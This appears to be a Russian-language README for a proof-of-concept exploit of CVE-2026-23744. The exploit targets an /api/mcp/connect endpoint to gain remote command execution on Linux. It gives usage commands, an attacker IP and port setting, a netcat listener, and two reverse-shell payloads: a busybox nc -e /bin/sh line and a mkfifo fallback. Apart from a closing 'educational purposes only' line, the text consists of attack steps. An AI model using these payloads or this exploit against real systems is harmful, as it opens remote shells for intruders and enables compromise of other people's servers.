
Эксплойт-доказательство концепции для CVE-2026-23744, нацеленный на /api/mcp/connect для достижения удалённого выполнения команд на системах Linux через обратную оболочку.
PoC для эксплуатации /api/mcp/connect с целью удалённого выполнения команд.
pip install requests
python3 exploit.py <цель>
Пример:
python3 exploit.py mcp.something.com
attacker_ip = "YOUR_IP"
port = 4444
nc -lvnp 4444
По умолчанию:
busybox nc <IP> <PORT> -e /bin/sh
Запасная:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | busybox nc <IP> <PORT> > /tmp/f
-e не сработалТолько для образовательных целей.